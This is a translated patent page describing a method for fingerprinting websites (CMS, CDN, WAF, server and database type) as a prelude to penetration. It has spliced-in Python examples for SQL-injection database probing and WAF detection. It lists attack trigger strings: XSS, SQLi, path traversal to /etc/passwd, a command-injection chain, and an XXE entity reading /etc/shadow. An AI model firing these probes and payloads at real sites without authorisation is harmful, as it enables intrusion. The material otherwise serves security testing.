CN115941280B - Penetration method, device, equipment and medium based on web fingerprint information - Google Patents


Info

Publication number: CN115941280B
Application number: CN202211408295.7A
Authority: CN (China)
Prior art keywords: information, penetration, fingerprint, site, fingerprint information
Legal status: Active
Other languages: Chinese (zh)
Other versions: CN115941280A
Inventors: 周嵩琛, 李可, 赵远杰, 胡维, 梁露露, 陈幼雷, 韩冰, 李季
Current assignee: Beijing Yuanbao Technology Co ltd
Original assignee: Beijing Yuanbao Technology Co ltd

Abstract

An embodiment of the invention provides a penetration method, device, equipment and medium based on web fingerprint information. The method comprises the following steps: determining penetration targets according to the form in which the website is built, and determining a penetration approach for one or more kinds of fingerprint information for each penetration target; analysing all site information of the penetration target and determining the objects of fingerprint detection; and, in a preset priority order, determining fingerprint information according to the penetration approach for that fingerprint information and the object of fingerprint detection, and carrying out penetration according to the fingerprint information. The method covers web fingerprint information of multiple categories and types over a wider range, so that the identification result is more accurate; and because the fingerprint information is determined in a preset priority order, the process is more efficient.

Description

Penetration method, device, equipment and medium based on web fingerprint information
Technical Field
The invention relates to the technical field of automated testing, and in particular to a penetration method, device, equipment and medium based on web fingerprint information.
Background
Known vulnerabilities are searched for and matched using the fingerprint information of a website, and vulnerability detection and exploitation are then carried out in order to penetrate the website, obtain privileges on it, obtain its data, and so on. The prior art discloses a vulnerability detection method and device based on web fingerprint information, in which the method comprises: determining the web site of a penetration target, the penetration target being a network system reachable over a network; collecting web fingerprint information of the web site; and detecting the externally exposed vulnerabilities of the penetration target using the web fingerprint information. However, the fingerprint-information collection of that scheme is not accurate enough, its coverage is not wide enough, and its vulnerability matching is not accurate enough.
Disclosure of Invention
In view of the above, embodiments of the invention provide a penetration method, device, equipment and medium based on web fingerprint information, to solve the technical problems in the prior art of inaccurate fingerprint-information collection, insufficient coverage and inaccurate vulnerability matching. The method comprises the following steps:
determining penetration targets according to the form in which the website is built, and determining a penetration approach for one or more kinds of fingerprint information for each penetration target;
analysing all site information of the penetration target and determining the objects of fingerprint detection;
in a preset priority order, determining fingerprint information according to the penetration approach for that fingerprint information and the object of fingerprint detection, and carrying out penetration according to the fingerprint information.
An embodiment of the invention also provides a penetration device based on web fingerprint information, which comprises:
a penetration-approach module, used to determine penetration targets according to the form in which the website is built and to determine a penetration approach for one or more kinds of fingerprint information for each penetration target;
a fingerprint-detection-object module, used to analyse all site information of the penetration target and determine the objects of fingerprint detection;
a fingerprint-information penetration module, used to determine fingerprint information according to the penetration approach for the fingerprint information and the object of fingerprint detection, and to carry out penetration according to the fingerprint information.
An embodiment of the invention also provides computer equipment comprising a memory, a processor and a computer program stored on the memory and runnable on the processor, where the processor implements any of the above penetration methods based on web fingerprint information when executing the computer program.
Embodiments of the invention also provide a computer-readable storage medium storing a computer program for executing any of the penetration methods based on web fingerprint information described above.
Compared with the prior art, the beneficial effects achievable by at least one of the technical solutions adopted in the embodiments of this description include at least the following:
penetration targets are determined according to the form in which the website is built, a penetration approach for one or more kinds of fingerprint information is determined for each penetration target, all site information of the penetration targets is analysed, and the objects of fingerprint detection are determined. In other words, the penetration targets can be websites built in different forms, and the objects of fingerprint detection are determined from all of the site information, so the detection objects are more diverse; this in turn allows web fingerprint information of multiple categories and types to be collected over a wider range, and improves the accuracy of vulnerability matching based on web fingerprint information. In addition, the fingerprint information is determined in a preset priority order, which improves the efficiency of fingerprint collection.
Drawings
In order to illustrate the technical solutions of the embodiments of the present application more clearly, the drawings needed in the embodiments are briefly described below. Obviously the drawings described below are only some embodiments of the present application, and a person skilled in the art could obtain other drawings from them without inventive effort.
FIG. 1 is a flow chart of a penetration method based on web fingerprint information provided by an embodiment of the present invention;
FIG. 2 is a block diagram of a computer device according to an embodiment of the present invention;
FIG. 3 is a block diagram of a penetration apparatus based on web fingerprint information according to an embodiment of the present invention.
Detailed Description
Embodiments of the present application are described in detail below with reference to the accompanying drawings.
Other advantages and effects of the present application will become apparent to those skilled in the art from the present disclosure, when the following description of the embodiments is taken in conjunction with the accompanying drawings. It will be apparent that the described embodiments are only some, but not all, of the embodiments of the present application. The present application may be embodied or carried out in other specific embodiments, and the details of the present application may be modified or changed from various points of view and applications without departing from the spirit of the present application. It should be noted that the following embodiments and features in the embodiments may be combined with each other without conflict. All other embodiments, which can be made by one of ordinary skill in the art based on the embodiments herein without making any inventive effort, are intended to be within the scope of the present application.
Web fingerprint identification is an important step in the information-collection phase of a penetration test. Using open-source tools, online platforms or manual methods, it is important to determine whether the target's CMS is a published CMS program or a secondary (custom) development; accurately obtaining the CMS type and the type and version of the web service components helps security engineers verify known vulnerabilities quickly and effectively.
A content management system (CMS) is a software system that sits between the web front end (the web server) and the back office or content process (content authoring and editing).
A content delivery network (CDN) is a distribution network built on top of the existing network. Using edge servers deployed in many locations, together with the load-balancing, content-distribution and scheduling functions of a central platform, a CDN lets users obtain the content they need from a nearby node, which reduces network congestion and improves response time and hit rate.
A web application firewall (WAF) is a product that protects web applications specifically, by enforcing a set of security policies on HTTP/HTTPS traffic.
In an embodiment of the present invention, a penetration method based on web fingerprint information is provided. As shown in FIG. 1, the method comprises:
Step one: determine penetration targets according to the form in which the website is built, and determine a penetration approach for one or more kinds of fingerprint information for each penetration target.
Specifically, website building forms are classified into the following categories:
1. a multi-directory site;
the same site has different entry points, for example www.xxx.com, www.xxx.com/bbs, www.xxx.com/old.
2. a multi-port site;
the same site is served on different ports, for example www.zzz.com, www.zzz.com:8080, www.zzz.com:8888.
3. a multi-domain-name site;
the same site has different domain names, for example www.yyy.com, bbs.
4. a multi-client site;
the same site has separate PC and mobile clients, for example www.yyy.com, m.yyy.com.
In particular embodiments, the penetration target comprises any one or any combination of the following:
the main-directory site and the sub-directory sites of a multi-directory site;
each port of a multi-port site;
each domain name of a multi-domain-name site;
the PC site and the mobile site of a multi-client site.
In a specific implementation, the four building forms correspond to the following penetration approaches:
a multi-directory site may be composed of several CMSs or frameworks, so the penetration target is really several targets, i.e. each directory site of the same website gets its own penetration approach;
a multi-port site may expose several services or frameworks on its ports, so the penetration target is really several ports, i.e. each port of the same website gets its own penetration approach;
for a multi-domain-name site, the other domain names may share a server or a network segment with the main site, and penetration through a secondary domain name can reach the main site directly, i.e. the several domain names of the same website share one penetration approach;
for a multi-client site, the PC and mobile framework programs differ and the mobile site needs to be tested separately, i.e. the PC and mobile sides of the same website use different penetration approaches.
Step two: analyse all site information (whole-site information) of the penetration target to determine the objects of fingerprint detection.
In a specific implementation, whole-site information analysis falls into the following categories:
1. Server type.
There are many server types, for example:
Windows: Server 2003, Server 2008, Server 2012, Server 2016, etc.
Linux: CentOS, RHEL, Ubuntu Server, Debian, etc.
The server type of a website can be judged remotely with the ping command, or by changing the suffix of a web page URL and examining the error feedback. Once the server type is known, the server version is obtained with an nmap scan, and the application server, IP, domain-name and port information are determined as objects of fingerprint detection according to the server type and version.
Specifically, the operating system type (i.e. the server type) can be probed with ping: Windows sends packets with an initial TTL of 128 and Linux with 64, and every router on the path decrements the value by one. So when the observed TTL is above 100 the operating system is generally Windows, and when it is in the tens (a little below 64) it is generally Linux.
Specifically, the version of the target web server can be judged with nmap, using the -O (OS detection) and -A (aggressive scan, which includes version detection) options.
2. Website container type.
The container type of the website is judged from the server type and version; from the container type, the software type and version of the web server are judged, the vulnerabilities of the web server are analysed, and the web server is determined as an object of fingerprint detection according to the analysed vulnerabilities.
Specifically, the web server type can be determined from the server type. There are many kinds of web server, for example:
Apache, Nginx, Tomcat and IIS. Once the web server type is known, its specific version can be detected, giving the web server as a detection object.
Some objects of fingerprint detection have vulnerabilities of their own: for example nginx versions below 0.83 have a parsing vulnerability, IIS 6.0 has a file-name parsing vulnerability, and IIS 7.0 has a malformed-path parsing vulnerability. Different web server versions have different vulnerabilities, so according to the analysed vulnerabilities the vulnerable web server can be taken as an object of fingerprint detection.
3. Script type.
The script type of the web server side is judged from the software type and version of the web server, and the development language is then determined as an object of fingerprint detection.
Specifically, the development language (a detection object) is obtained by judging the script type, for example the commonly used PHP, JSP, ASP and ASPX.
4. Database type.
The database type is judged from system-table information, or from the server system variables stored in the database, and the development language is determined as an object of fingerprint detection according to the database type.
Specifically, the type of database used by the website needs to be determined, for example MySQL, Oracle, SQL Server or Access. Database syntax is broadly the same but differs slightly between products and versions, so the type and version of the database used by the target website are obtained and the development language is determined from them.
The database type can be determined from a system table, or from the server system variables stored in the database. For example, the system table of Access is msysobjects and is not readable in a web environment, while the system table of SQL Server is sysobjects and is readable in a web environment.
For example, the following two statements are used:
1. http://xxx.xxx.xxx/abc.asp?p=YY and (select count(*) from msysobjects)>0
2. http://xxx.xxx.xxx/abc.asp?p=YY and (select count(*) from sysobjects)>0
If the database is Access, both requests return an error. If the database is SQL Server, the second request to abc.asp always runs normally and the first returns an error.
Common scripts pair with databases as follows: ASP and ASPX with Access and SQL Server; PHP with MySQL and PostgreSQL; JSP with Oracle and MySQL. From this the development language of the detection object is obtained.
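As an added example (not part of the patent text), the following Python code implements the two whole-site checks described in this step: TTL-based operating-system inference from ping output, and the two-probe database-type test using the msysobjects/sysobjects statements. The ping lines, the page body and the fake_fetch client are constructed stand-ins; the default initial TTLs (64 for Linux, 128 for Windows, 255 for many network devices) are general networking facts rather than something the description states. Replace fake_fetch with a real HTTP client only against a target you are authorised to test.

```python
import re

# Default initial TTLs of common network stacks (general networking fact, not
# something the description states): Linux/macOS 64, Windows 128, many network
# devices and Solaris 255. Ordered ascending so the first value >= observed wins.
INITIAL_TTLS = ((64, "Linux"), (128, "Windows"), (255, "network device / Solaris"))
TTL_RE = re.compile(r"\bttl[=:]\s*(\d+)", re.I)


def ttl_from_ping_line(line):
    """Extract the TTL from one ping reply line; handles Linux 'ttl=64' and
    Windows 'TTL=128' formats. Returns None for lines without a TTL."""
    m = TTL_RE.search(line)
    return int(m.group(1)) if m else None


def guess_os(observed_ttl):
    """Every router on the path decrements the TTL by one, so the sender's initial
    value is the smallest default TTL >= the observed one; the difference is the
    hop count. Returns (os_guess, initial_ttl, hops)."""
    for initial, os_name in INITIAL_TTLS:
        if observed_ttl <= initial:
            return os_name, initial, initial - observed_ttl
    return "unknown", None, None


def guess_os_from_ping_output(text):
    """Apply guess_os to the most frequent TTL seen in a block of ping output."""
    ttls = [t for t in map(ttl_from_ping_line, text.splitlines()) if t is not None]
    if not ttls:
        return "unknown", None, None
    return guess_os(max(set(ttls), key=ttls.count))


# The two probe statements from the description, appended to an injectable parameter.
ACCESS_PROBE = " and (select count(*) from msysobjects)>0"
MSSQL_PROBE = " and (select count(*) from sysobjects)>0"


def probe_db_type(base_url, fetch):
    """Boolean-probe database-type test. fetch(url) -> (status, body). A probe
    is 'normal' when the page renders like the baseline. Access cannot read
    msysobjects from the web and has no sysobjects, so both probes error there,
    while SQL Server answers the sysobjects probe normally."""
    base_status, base_body = fetch(base_url)

    def normal(url):
        status, body = fetch(url)
        return status == base_status and len(body) == len(base_body)

    access_ok = normal(base_url + ACCESS_PROBE)
    mssql_ok = normal(base_url + MSSQL_PROBE)
    if mssql_ok and not access_ok:
        return "SQL Server"
    if not mssql_ok and not access_ok:
        return "Access"
    return "undetermined"   # both normal: parameter not injectable, or another DBMS


NORMAL_PAGE = "<html><body>item YY</body></html>"   # constructed page body


def fake_fetch(backend):
    """Constructed stand-in for an HTTP client: an ASP page with an injectable
    parameter p, backed by either 'access' or 'mssql'. Replace with a real
    client only against a target you are authorised to test."""
    def fetch(url):
        if "msysobjects" in url:          # checked first: 'sysobjects' is a substring of it
            return 500, "database error"  # unreadable in Access, non-existent in SQL Server
        if "sysobjects" in url:
            return (200, NORMAL_PAGE) if backend == "mssql" else (500, "database error")
        return 200, NORMAL_PAGE
    return fetch


if __name__ == "__main__":
    ping_out = ("PING www.xxx.com (93.184.216.34) 56(84) bytes of data.\n"
                "64 bytes from 93.184.216.34: icmp_seq=1 ttl=51 time=12.3 ms\n"
                "64 bytes from 93.184.216.34: icmp_seq=2 ttl=51 time=12.1 ms\n")  # constructed
    print(guess_os_from_ping_output(ping_out))
    print(probe_db_type("http://xxx.xxx.xxx/abc.asp?p=YY", fake_fetch("mssql")))
```

The hop estimate (initial TTL minus observed TTL) is what keeps a Windows host fifteen hops away, answering with TTL 113, distinguishable from a Linux host, and it is why the "above 100" and "in the tens" thresholds in the description work. The probe comparison uses status code and body length rather than exact body equality because dynamic pages often embed timestamps or nonces that would otherwise make every response look "abnormal".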
Step three: in a preset priority order, determine fingerprint information according to the penetration approach for the fingerprint information and the object of fingerprint detection.
In the web penetration process, web fingerprint identification is an important step of the information-collection phase. Using open-source tools, online platforms or manual methods, it is important to determine whether the CMS is a published CMS program or a secondary development; accurately obtaining the CMS type and the type and version of the web service components helps security engineers verify known vulnerabilities quickly and effectively.
The objects of fingerprint detection may be:
1) CMS information: for example DedeCMS (Zhimeng), Empire CMS, PHPCMS, ECShop and other Chinese CMSs;
2) Front-end technology: for example HTML5, jQuery, Bootstrap, Pure, Ace, etc.;
3) Web server: for example Apache, lighttpd, Nginx, IIS, etc.;
4) Application server: for example Tomcat, JBoss, WebLogic, WebSphere, etc.;
5) Development language: for example PHP, Java, Ruby, Python, C#, etc.;
6) Operating system information: for example RHEL, Windows Server 2008, CentOS, etc.;
7) CDN information: whether a CDN is used, for example Cloudflare, 360CDN, 365cyd, Yunjiasu, etc.;
8) WAF information: whether a WAF is used, for example Topsec, Jiasule, Yundun, etc.;
9) IP and domain-name information: IP and domain-name registration information, service-provider information, etc.;
10) Port information: some tools or platforms also probe the common ports open on the server.
In a specific implementation, the main penetration target is the CMS, but in practice the target website may have protective measures, so when the CMS cannot be penetrated, the fingerprints of the CDN and the WAF are identified, giving a more accurate identification result. The preset priority order of the objects of fingerprint detection, from high to low, may be: CMS information, CDN information, WAF information.
In practice, a CMS is a content management system, and most websites manage their content with one. CMS-based sites include blogs, microblogs, online shops and so on, built on a range of open-source website-building systems, for example Discuz! for forums and WordPress for blogs.
Different kinds of website use different open-source CMSs:
1. enterprise site builders: MetInfo (Mituo), Chanzhi, SiteServer CMS, etc.;
2. B2C shop systems: ShopEx (Shangpai), ECShop, HiShop, XpShop, etc.;
3. portal systems: DedeCMS (Zhimeng), Empire CMS, PHPCMS, CmsTop, etc.;
4. blog systems: WordPress, Z-Blog, etc.;
5. forum communities: Discuz!, PHPWind, WeCenter, etc.;
6. question-and-answer systems: Tipask, whatsns, etc.;
7. wiki systems: HDWiki;
8. B2B portal systems: Destoon, B2Bbuilder, Friend B2B, etc.;
9. recruitment site systems: Knight CMS (Qishi CMS) and the PHPYun talent management system;
10. real-estate site systems: FangCms, etc.;
11. online-education site builders: Kesion, EduSoho;
12. film site systems: Apple CMS (maccms), CTCMS, MovCMS, etc.;
13. fiction site builders: Jieqi CMS.
Once a website is opened and the program it runs (i.e. the type and version of software used) has been identified, penetration based on that fingerprint information can proceed.
In an implementation, fingerprint information may be determined according to the penetration approach for the fingerprint information and the object of fingerprint detection, for example in the following ways:
judging the type of static file from the building form and the whole-site information of the server side, fetching the md5 value of files of that type, and looking up the CMS information corresponding to the fetched md5 value in the md5-to-CMS mapping of a rule base;
determining the correspondence between keywords and CMS information, fetching the keywords of the home page or a designated page by accessing it, matching the fetched keywords against the keyword-to-CMS correspondence, and obtaining the CMS information corresponding to the fetched keywords from the match result;
identifying the CMS information by means of banner information;
judging the CMS information from the URL address;
obtaining dynamic links with a crawler and judging the development language used by the server from the dynamic links;
identifying the development language used by the server through the X-Powered-By or Set-Cookie headers.
In practice, the CMS may be identified through certain specific files or code, for example:
1. Copyright information.
1) The CMS information may be learned from the copyright notice of a website, which is usually found directly at the bottom of the page.
2) Some websites can be identified from the browser tab: the page title alone reveals the CMS.
2. md5 of specific files.
The md5 values of certain files can be looked up to determine the CMS of the website.
The md5 value of a given file content is fixed: when the content changes the md5 value changes, and identical content gives identical md5 values, so the md5 value can serve as an identifier for the file.
Static files that are rarely changed are queried to determine which system is in use, for example picture, JS and CSS files such as favicon.ico, logo.ico, style sheets and scripts, which most sites never modify. A crawler fetches these files and computes their md5 values, which are compared with the md5-to-CMS mapping in a rule base; a match with an md5 in the rule base indicates the corresponding CMS. This approach is fast and has a relatively low false-positive rate, but it cannot be ruled out that some secondarily developed CMSs modify these files.
3. Viewing the page source.
The system in use can be analysed by right-clicking and viewing the page source. For example, the source of a WordPress site contains many "wp-" prefixes, which practically confirms that WordPress is used.
4. Analysis of specific files.
By analysing the content of specific files, for example, the correspondence between keywords and CMS information can be determined from the keywords contained in normal historical pages or error pages. The keywords of the home page or a specific page (such as robots.txt) are fetched by accessing it and matched against the keyword-to-CMS correspondence with regular expressions; keywords such as "Powered by Discuz" or "DedeCMS" then yield the corresponding CMS information.
The CMS or middleware in use can also be judged from error information, by requesting a non-existent path or otherwise constructing an error page, for example Tomcat's error page.
5. Keyword matching of response header information.
CMS information is identified from the header information returned in the website's response: the HTTP response headers, cookies, Server information, and the router information of routing and switching equipment. WhatWeb and Wappalyzer identify fingerprints quickly from banner information, and FOFA's web fingerprint library is widely used; this is very efficient, since a single basic request suffices.
There are generally several ways to identify CMS information from the response header:
1) look at the X-Powered-By field of the HTTP response header;
2) judge from cookies: for example some WAFs put identifying information in the response header, such as 360wzws, safedog or yunsuo;
3) judge from the Server information in the header, such as DVRDVS-Webs, yunjiasu-nginx, Mod_Security, nginx-wallarm and the like;
4) judge from the WWW-Authenticate header, which some routers and switches carry, for example NETCORE, Huawei, H3C.
5) Keywords contained in parts of the URL.
URL key features such as wp-includes or dede.
A rule base is used to check whether the corresponding directory exists; the linked URLs in the crawler result are analysed, and the directories listed in robots.txt are checked. For example WordPress has wp-includes and wp-admin directories by default, the default admin backend of DedeCMS (Zhimeng) is the dede directory, a Solr platform may use a /solr directory, WebLogic may use a wls-wsat directory, and so on.
6. Development-language identification.
Web development languages are generally PHP, JSP, ASPX, ASP and so on, and are recognised as follows:
1) Dynamic links are obtained with a crawler and the development language used by the server is judged directly from them; this is the simplest and most convenient method.
For example, the ASP rule matches anchor hrefs whose path ends in .asp, along the lines of <a[^>]*?href=['"][^'"]*?\.asp(\?|['"]);
2) identification through X-Powered-By;
for example X-Powered-By: ASP.NET or X-Powered-By: PHP/7.1.8, etc.
3) identification through Set-Cookie;
for example a PHPSESSID cookie indicates PHP, JSESSIONID indicates Java, and ASP.NET_SessionId indicates ASP.NET.
In a specific implementation, CDN fingerprinting uses:
1. multi-location ping ("super ping");
2. historical DNS records;
3. querying the IP address through subdomains;
4. resolution from overseas hosts;
5. other identification methods.
A WAF (Web Application Firewall) filters HTTP/HTTPS requests to identify malicious parameters and malicious requests. A WAF has many roles:
1. SQL Injection (SQLi): preventing SQL injection;
2. Cross-Site Scripting (XSS): preventing cross-site scripting attacks;
3. Local File Inclusion (LFI): preventing attacks that exploit local file inclusion vulnerabilities;
4. Remote File Inclusion (RFI): preventing attacks that exploit remote file inclusion vulnerabilities;
5. Remote Code Execution (RCE): preventing attacks that exploit remote command execution vulnerabilities;
6. PHP Code Injection: preventing PHP code injection;
7. HTTP Protocol Violations: preventing malicious access that violates the HTTP protocol;
8. HTTPoxy: preventing attacks that exploit the HTTPoxy (HTTP_PROXY header) vulnerability;
9. Shellshock: preventing attacks that exploit the Shellshock vulnerability;
10. Session Fixation: preventing attacks that exploit an unchanging session ID;
11. Scanner Detection: preventing attackers from scanning the website;
12. Metadata/Error Leakage: preventing source-code and error-information leakage;
13. Project Honey Pot Blacklist: a blacklist from the honeypot project;
14. GeoIP Country Blocking: blocking IP addresses according to their geographic origin.
In particular implementations, WAF fingerprinting identifies the following:
1. The WAF vendor.
1) Different vendors are recognised from their different interception pages.
2) The firewall is triggered with an illegal parameter and fingerprinting is then performed with a tool such as wafw00f or nmap.
The indicators that illegal parameters expose include: additional cookies; any additional headers in the response or request; the response content (if the request was blocked); the response code (if the request was blocked); the IP address (cloud WAF); a JS client module (client-side WAF).
For example:
xsstring = '<script>alert("XSS");</script>'
sqlistring = "UNION SELECT ALL FROM information_schema AND 'or SLEEP(5)or'"
lfistring = '../../../../etc/passwd'
rcestring = '/bin/cat /etc/passwd;ping 127.0.0.1;curl google.com'
xxestring = '<!ENTITY xxe SYSTEM "file:///etc/shadow">]><pwn>&hack;</pwn>'
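As an added example (not the patent's code, and not wafw00f or nmap), this Python function sends each of the illegal-parameter payloads listed above and compares the response with a benign baseline, recording the indicators the description names: a changed response code, headers or cookies that appear only on the blocked response, and vendor tokens in cookies, the Server header or the block page. The Response class, the fake_send client and the block-page phrase are constructed; the cookie and Server tokens (safedog, yunsuo, 360wzws, yunjiasu-nginx, Mod_Security, nginx-wallarm, DVRDVS-Webs) are the ones the description lists.

```python
import re
from dataclasses import dataclass, field
from urllib.parse import quote, unquote


@dataclass
class Response:
    """Constructed stand-in for an HTTP response (header names lower-cased,
    set-cookie kept as a list)."""
    status: int
    headers: dict = field(default_factory=dict)
    body: str = ""


# Illegal-parameter payloads, one per attack class, as given in the description.
PAYLOADS = {
    "xss": '<script>alert("XSS");</script>',
    "sqli": "UNION SELECT ALL FROM information_schema AND 'or SLEEP(5)or'",
    "lfi": "../../../../etc/passwd",
    "rce": "/bin/cat /etc/passwd;ping 127.0.0.1;curl google.com",
    "xxe": '<!ENTITY xxe SYSTEM "file:///etc/shadow">]><pwn>&hack;</pwn>',
}

# Vendor signatures: (where to look, pattern, label). Cookie and Server tokens are
# the ones the description lists; the block-page phrase is a constructed placeholder.
SIGNATURES = [
    ("cookie", re.compile(r"safedog", re.I), "Safedog"),
    ("cookie", re.compile(r"yunsuo", re.I), "Yunsuo"),
    ("cookie", re.compile(r"360wzws", re.I), "360wzws"),
    ("server", re.compile(r"yunjiasu-nginx", re.I), "Yunjiasu"),
    ("server", re.compile(r"mod_security", re.I), "ModSecurity"),
    ("server", re.compile(r"wallarm", re.I), "Wallarm"),
    ("server", re.compile(r"DVRDVS-Webs", re.I), "DVRDVS-Webs"),
    ("body", re.compile(r"blocked by the web application firewall", re.I), "generic block page (constructed)"),
]


def detect_waf(base_url, param, send):
    """Differential probe: compare each illegal-parameter request with a benign
    baseline request. send(url) -> Response.
    Returns {"waf": bool, "vendors": [str], "signals": [str]}."""
    baseline = send(f"{base_url}?{param}=1")
    signals, vendors = [], set()
    for name, payload in PAYLOADS.items():
        attack = send(f"{base_url}?{param}={quote(payload, safe='')}")
        if attack.status != baseline.status:                       # response code changed
            signals.append(f"{name}: status {baseline.status} -> {attack.status}")
        for extra in sorted(set(attack.headers) - set(baseline.headers)):
            signals.append(f"{name}: header {extra} only on blocked response")
        cookie_names = [c.split("=", 1)[0] for c in attack.headers.get("set-cookie", [])]
        haystacks = {"cookie": " ".join(cookie_names),
                     "server": attack.headers.get("server", ""),
                     "body": attack.body}
        for where, rx, vendor in SIGNATURES:
            if rx.search(haystacks[where]):
                vendors.add(vendor)
    return {"waf": bool(signals or vendors), "vendors": sorted(vendors), "signals": signals}


BLOCK_MARKERS = ("<script", "union select", "../", "/etc/", "<!entity")


def fake_send(protected):
    """Constructed stand-in for an HTTP client. With protected=True it imitates a
    site behind a cookie-setting WAF that answers 403 to the markers above; with
    protected=False every request gets the normal page."""
    def send(url):
        decoded = unquote(url).lower()
        if protected and any(m in decoded for m in BLOCK_MARKERS):
            return Response(403,
                            {"server": "nginx", "set-cookie": ["safedog-flow-item=1; path=/"]},
                            "Request blocked by the web application firewall")
        return Response(200, {"server": "nginx"}, "<html>search results</html>")
    return send


if __name__ == "__main__":
    print(detect_waf("http://www.xxx.com/search", "q", fake_send(True)))
    print(detect_waf("http://www.xxx.com/search", "q", fake_send(False)))
```

The sqli payload contains SLEEP(5); against a real, unprotected target it can actually delay the response, so a real run should set a client timeout, and it must only be pointed at a system you are authorised to test.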
In a specific implementation, once the fingerprint information has been obtained, accurate penetration based on it can be achieved by, for example, determining a vulnerability from the fingerprint information and, when the vulnerability is confirmed to exist, penetrating through an exploit (exp). Vulnerability matching is performed according to the obtained web fingerprint information, a proof of concept (poc) is used to detect whether the matched vulnerability actually exists, and only if it exists is penetration carried out through the exp for the matched vulnerability.
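As an added example that is not part of the patent, the following Python code shows this final matching step: a Server header is parsed into product and version, matched against a small rule base with version ranges, and each match is confirmed with a poc callable before an exp callable is invoked. The rule entries are the version/vulnerability pairs named earlier in the description (nginx below 0.83, IIS 6.0, IIS 7.0), written as the description states them rather than as CVE identifiers; the poc and exp callables in demo() are constructed stand-ins that only inspect the target string and perform no network activity.

```python
import re


def parse_version(text):
    """'1.18.0' -> (1, 18, 0). Only the numeric components are compared."""
    return tuple(int(x) for x in re.findall(r"\d+", text))


def parse_server_header(server):
    """'Microsoft-IIS/6.0' -> ('iis', '6.0'); 'nginx/1.18.0' -> ('nginx', '1.18.0').
    Returns (None, None) when the header carries no version."""
    m = re.match(r"\s*(?:Microsoft-)?([A-Za-z][\w-]*)/([\d.]+)", server)
    if not m:
        return None, None
    return m.group(1).lower(), m.group(2)


# Vulnerability rule base: (product, low inclusive, high exclusive, name).
# The entries are the ones the description names; None means unbounded.
RULES = [
    ("nginx", None, "0.83", "nginx parsing vulnerability (versions below 0.83)"),
    ("iis", "6.0", "6.1", "IIS 6.0 file-name parsing vulnerability"),
    ("iis", "7.0", "7.1", "IIS 7.0 malformed-path parsing vulnerability"),
]


def match_vulns(product, version):
    """Return the names of rules whose product and version range cover the fingerprint."""
    v = parse_version(version)
    hits = []
    for prod, low, high, name in RULES:
        if prod != product:
            continue
        if low is not None and v < parse_version(low):
            continue
        if high is not None and v >= parse_version(high):
            continue
        hits.append(name)
    return hits


def penetrate(server_header, target, pocs, exps):
    """pocs / exps: {vulnerability name: callable(target) -> bool}. A matched
    vulnerability is exploited only after its poc confirms it, mirroring the
    poc-then-exp order in the description."""
    product, version = parse_server_header(server_header)
    if product is None:
        return {"matched": [], "confirmed": [], "exploited": []}
    matched = match_vulns(product, version)
    confirmed = [n for n in matched if n in pocs and pocs[n](target)]
    exploited = [n for n in confirmed if n in exps and exps[n](target)]
    return {"matched": matched, "confirmed": confirmed, "exploited": exploited}


def demo():
    """Constructed run: the poc/exp callables only inspect the target string and
    do no network activity; they stand in for real checks."""
    iis6 = "IIS 6.0 file-name parsing vulnerability"
    pocs = {iis6: lambda target: "iis6" in target}
    exps = {iis6: lambda target: True}
    return penetrate("Microsoft-IIS/6.0", "http://www.xxx.com/iis6-lab/", pocs, exps)


if __name__ == "__main__":
    print(demo())
```

Keeping the poc gate separate from the version match matters in practice: a banner can be spoofed or backported (a distribution may ship a patched build under the old version string), so the version range only selects candidates and the poc decides.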
In this embodiment, a computer device is provided, as shown in fig. 2, including a memory 201, a processor 202, and a computer program stored on the memory and executable on the processor, where the processor implements any of the above web fingerprint information based penetration methods when executing the computer program.
In particular, the computer device may be a computer terminal, a server or similar computing means.
In the present embodiment, a computer-readable storage medium storing a computer program for executing any of the web fingerprint information-based penetration methods described above is provided.
In particular, computer-readable storage media, including permanent and non-permanent, removable and non-removable media, may implement information storage by any method or technology. The information may be computer-readable instructions, data structures, program modules, or other data. Examples of computer-readable storage media include, but are not limited to, phase-change memory (PRAM), static random access memory (SRAM), dynamic random access memory (DRAM), other types of random access memory (RAM), read-only memory (ROM), electrically erasable programmable read-only memory (EEPROM), flash memory or other memory technology, compact disc read-only memory (CD-ROM), digital versatile discs (DVD) or other optical storage, magnetic cassettes, magnetic tape, magnetic disk storage or other magnetic storage devices, or any other non-transmission medium that can be used to store information accessible by a computing device. Computer-readable storage media, as defined herein, do not include transitory computer-readable media (transmission media) such as modulated data signals and carrier waves.
Based on the same inventive concept, an embodiment of the invention also provides a penetration device based on web fingerprint information, as described in the following embodiment. Since the principle by which the web fingerprint information-based penetration device solves the problem is similar to that of the web fingerprint information-based penetration method, the implementation of the device can refer to the implementation of the method, and the repetition is omitted. As used below, the term "unit" or "module" may be a combination of software and/or hardware that implements the intended function. While the means described in the following embodiments are preferably implemented in software, implementation in hardware, or in a combination of software and hardware, is also possible and contemplated.
Fig. 3 is a block diagram of a web fingerprint information-based penetration apparatus according to an embodiment of the present invention; as shown in fig. 3, it includes:
the penetration idea acquisition module 301, configured to determine penetration targets according to the website building form and to determine one or more penetration ideas of fingerprint information for each penetration target;
the fingerprint detection object acquisition module 302, configured to analyze all site information of the penetration target according to a preset priority order and to determine the object of fingerprint detection;
the fingerprint information penetration module 303, configured to determine fingerprint information, according to a preset priority order, from the penetration idea of the fingerprint information and the object of fingerprint detection, and to perform penetration according to the fingerprint information.
In one embodiment, the object of fingerprint detection comprises any one or any combination of the following: CMS information, CDN information, and WAF information. The preset priority order is from high to low: CMS information, CDN information, WAF information.
In one embodiment, the penetration idea acquisition module includes:
a penetration idea determining unit for determining a penetration idea for each CMS, where the penetration idea comprises: each directory site of the same website uses a penetration method, each port of the same website uses a penetration method, multiple domain name sites of the same website use the same penetration method, and the PC end and the mobile end of the same website use different penetration methods.
In one embodiment, the fingerprint detection object acquisition module includes:
a first fingerprint detection object determining unit for remotely judging the server type of the website by using a PING command or by modifying the web page suffix and observing the feedback information, then acquiring the server version through an nmap scan according to the server type, and determining the application server, IP, domain name information and port information as fingerprint detection objects according to the server type and the server version;
a second fingerprint detection object determining unit for judging the container type of the website from the server type and server version, judging the software type and software version of the Web server according to the container type, analyzing the vulnerabilities of the Web server according to its software type and software version, and determining the Web server as a fingerprint detection object according to the analyzed vulnerabilities;
and a third fingerprint detection object determining unit for determining the development language as a fingerprint detection object according to the software type and software version of the Web server, judging the database type through system table information or according to server system variables prestored in the database, and determining the development language as a fingerprint detection object according to the database type.
In one embodiment, the fingerprint information penetration module comprises:
a first CMS information determining unit for judging the static file type from the website building form and the whole-site building information of the server side, obtaining the md5 value of the static file according to its type, and obtaining the CMS information corresponding to that md5 value from the mapping between md5 values and CMS in the rule base;
